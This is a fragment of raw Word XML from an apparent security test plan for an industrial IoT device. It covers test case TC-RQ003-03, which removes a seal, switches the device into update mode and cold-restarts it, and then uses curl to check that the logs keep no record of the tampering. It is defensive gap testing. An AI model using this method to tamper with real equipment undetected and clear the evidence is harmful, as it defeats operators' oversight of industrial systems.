          <w:p w14:paraId="41090AAC" w14:textId="54F46EF3" w:rsidR="00B73A1A" w:rsidRPr="00D1454A" w:rsidRDefault="009B6AD1" w:rsidP="009B6AD1">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1739"/>
              </w:tabs>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B6AD1">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> IoT-Core screenshots</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6462FA79" w14:textId="77777777" w:rsidR="00EF7F75" w:rsidRDefault="00EF7F75" w:rsidP="004B3AEF">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF0437D" w14:textId="77777777" w:rsidR="00EF7F75" w:rsidRDefault="00EF7F75" w:rsidP="004B3AEF">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD07B59" w14:textId="26F53C25" w:rsidR="005A760D" w:rsidRPr="00271C74" w:rsidRDefault="005A760D" w:rsidP="005A760D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00271C74">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ003-03 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00271C74">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Illegitimate Physical Intervention &amp; Anti-Forensic Clearing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68166A68" w14:textId="77777777" w:rsidR="00EF7F75" w:rsidRPr="00611347" w:rsidRDefault="00EF7F75" w:rsidP="004B3AEF">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D5CBE7F" w14:textId="0559FB9D" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="004B3AEF">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4B3AEF" w14:paraId="66B07B3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04E069" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1821E08F" w14:textId="77777777" w:rsidR="004B3AEF"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4B3AEF" w14:paraId="73D5E9E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B736F02" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36764F88" w14:textId="1282AE70" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="00091DEE"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91DEE">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ003-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00316EA1" w14:paraId="4E1EEF25"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07B000F" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39BE21AE" w14:textId="50F36D5C" w:rsidR="004B3AEF" w:rsidRPr="00611347" w:rsidRDefault="00C60EB3"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11347">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ-003 → EDR 3.11 (detection) / CR 2.8 / CR 2.12 / CR 3.9 → Asset G, Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00D67CA6" w14:paraId="689E43A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C93D9A" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A4D0AA6" w14:textId="4973AB58" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="009725E0"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Repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w14:paraId="11467E05"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A95D368" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00DBF4AF" w14:textId="223F6245" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="009725E0"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SVV-4 (Penetration Testing-physical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00316EA1" w14:paraId="3398E18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5D523E" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F29045B" w14:textId="129AC686" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="0076446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64464">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate that (a) a physical intervention avoiding visible seal damage produces no automatic tamper record and no attribution, and (b) a subsequent cold start clears any incidental log content</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00764464">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> proving the device cannot collect retained, protected evidence of intervention.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00316EA1" w14:paraId="05D3668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B1133BE" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66B81DE9" w14:textId="77777777" w:rsidR="00B34E53" w:rsidRDefault="00B34E53"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34E53">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Capture baseline log/I&amp;M/address. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F463DA2" w14:textId="77777777" w:rsidR="00B34E53" w:rsidRDefault="00B34E53"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34E53">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Remove seal/sleeve carefully; change the rotary switch (incl. → 999 to enter update mode); note any live status change. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="171FB6A3" w14:textId="77777777" w:rsidR="00B34E53" w:rsidRDefault="00B34E53"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34E53">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Cold-restart to apply the change. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59D24DFE" w14:textId="77777777" w:rsidR="00B34E53" w:rsidRDefault="00B34E53"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34E53">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Re-read the log and check for any tamper/intervention entry; check whether the log survived the cold start. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DFAB3E0" w14:textId="36AE5A7D" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="00B34E53"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34E53">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5. Assess attribution (identity) and timing (absolute timestamp) of anything found.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00316EA1" w14:paraId="595D8F0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110DD4" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="304D2864" w14:textId="77777777" w:rsidR="00461F5A" w:rsidRDefault="00461F5A"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461F5A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Gap-characterisation test. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B4C4E1E" w14:textId="4DE6F4E1" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="00461F5A"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461F5A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected: no tamper-specific entry is generated; any incidental entries are lost on cold start; no user identity and no absolute timestamp are present. This confirms G-1 (no detection/attribution) and G-3 </w:t>
            </w:r>
            <w:r w:rsidRPr="00461F5A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>(unprotected, non-retained evidence) → FAIL against RQ-003 is recorded. A device that did produce a persistent, attributed, time-stamped tamper record would indicate an undocumented capability to investigate.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75457109" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRPr="00AF57B2" w:rsidRDefault="004B3AEF" w:rsidP="004B3AEF">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="040E5086" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="004B3AEF">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4B3AEF" w14:paraId="6273CC55"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33C7AC" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="417FE4A8" w14:textId="77777777" w:rsidR="004B3AEF"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4B3AEF" w14:paraId="1F66F2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72C7C7" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4166CA2D" w14:textId="57E5A673" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="00BB1CC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B1CC4">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ003-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00F15AEA" w14:paraId="0F19FA1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76822C" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C9DB17C" w14:textId="77777777" w:rsidR="003C706A" w:rsidRDefault="003C706A" w:rsidP="003C706A">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06A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Physical access to DUT 192.168.0.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CA88C6C" w14:textId="77777777" w:rsidR="003C706A" w:rsidRDefault="003C706A" w:rsidP="003C706A">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06A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">mgmt path Pi eth1 = 192.168.50.10; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C6CA59B" w14:textId="20B57725" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="003C706A" w:rsidP="003C706A">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06A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>browser 192.168.50.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00BB230F" w14:paraId="13E8A76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9AE79D" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="412951BD" w14:textId="77777777" w:rsidR="00032E81" w:rsidRDefault="00032E8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32E81">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Manual (seal removal, switch actuation); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FE30946" w14:textId="77777777" w:rsidR="00032E81" w:rsidRDefault="00032E8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32E81">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">camera; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BB46DE4" w14:textId="6931A064" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="00032E8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32E81">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl to IoT-Core</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00316EA1" w14:paraId="1997A24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F6B29FB" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03F7EB64" w14:textId="77777777" w:rsidR="0017616C" w:rsidRPr="0017616C"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 TC-RQ003-03 Physical tamper -&gt; evidence check across cold start</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="590E1732" w14:textId="77777777" w:rsidR="0017616C" w:rsidRPr="0017616C"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curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC03_log_before.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C9CCF05" w14:textId="77777777" w:rsidR="0017616C" w:rsidRPr="0017616C"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curl -s http://192.168.0.2/safecom/f_address -o TC03_addr_before.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76BEB2A7" w14:textId="77777777" w:rsidR="0017616C" w:rsidRPr="0017616C"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curl -s http://192.168.0.2/devicestatus/operatingstate -o TC03_state_before.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CD8A795" w14:textId="77777777" w:rsidR="0017616C" w:rsidRPr="0017616C"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 --- remove seal, change rotary switch (e.g. addr change; then 999), COLD RESTART ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EA1BCCB" w14:textId="77777777" w:rsidR="0017616C" w:rsidRPr="00611347"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611347">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC03_log_after.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DD4A464" w14:textId="77777777" w:rsidR="0017616C" w:rsidRPr="0017616C"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curl -s http://192.168.0.2/safecom/f_address -o TC03_addr_after.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D365CEC" w14:textId="71B378DA" w:rsidR="004B3AEF" w:rsidRPr="00D1454A"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diff TC03_log_before.json TC03_log_after.json | tee TC03_logdiff.txt # expect: empty/cleared, no tamper event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00316EA1" w14:paraId="4C05F20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3A3245" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78A77A26" w14:textId="5CB8C943" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="000819DF"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819DF">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>No tamper entry; log empty after cold start (circular, non-safety QM, cleared on cold start); address changed with no attribution/time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00316EA1" w14:paraId="41CE18DE"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1B22B184" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D00C68F" w14:textId="37C4FD87" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="000819DF"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Pr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>No evidence collected/ Evidence found</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="00316EA1" w14:paraId="0DA72A4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9CC9FA" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46F3D2F7" w14:textId="77777777" w:rsidR="00430D29" w:rsidRDefault="00430D2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430D29">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Seal before/after photos, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49CCAF19" w14:textId="77777777" w:rsidR="00430D29" w:rsidRDefault="00430D2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430D29">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC03_log_before/after.json,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05D2785E" w14:textId="77777777" w:rsidR="00430D29" w:rsidRDefault="00430D2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430D29">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> TC03_logdiff.txt, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C0C5798" w14:textId="77777777" w:rsidR="00430D29" w:rsidRDefault="00430D2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430D29">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">update-mode LED photo, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BFD40AF" w14:textId="76606B96" w:rsidR="004B3AEF" w:rsidRPr="00D1454A" w:rsidRDefault="00430D2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430D29">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>address diff</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46DEF34F" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78177774" w14:textId="1C5F350E" w:rsidR="004B3AEF" w:rsidRDefault="009100BF" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00271C74">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ003-04 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00271C74">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Time-Attribution Failure of Collected Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C6D2F5" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="004B3AEF">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4B3AEF" w14:paraId="13A1000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97D2E7" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
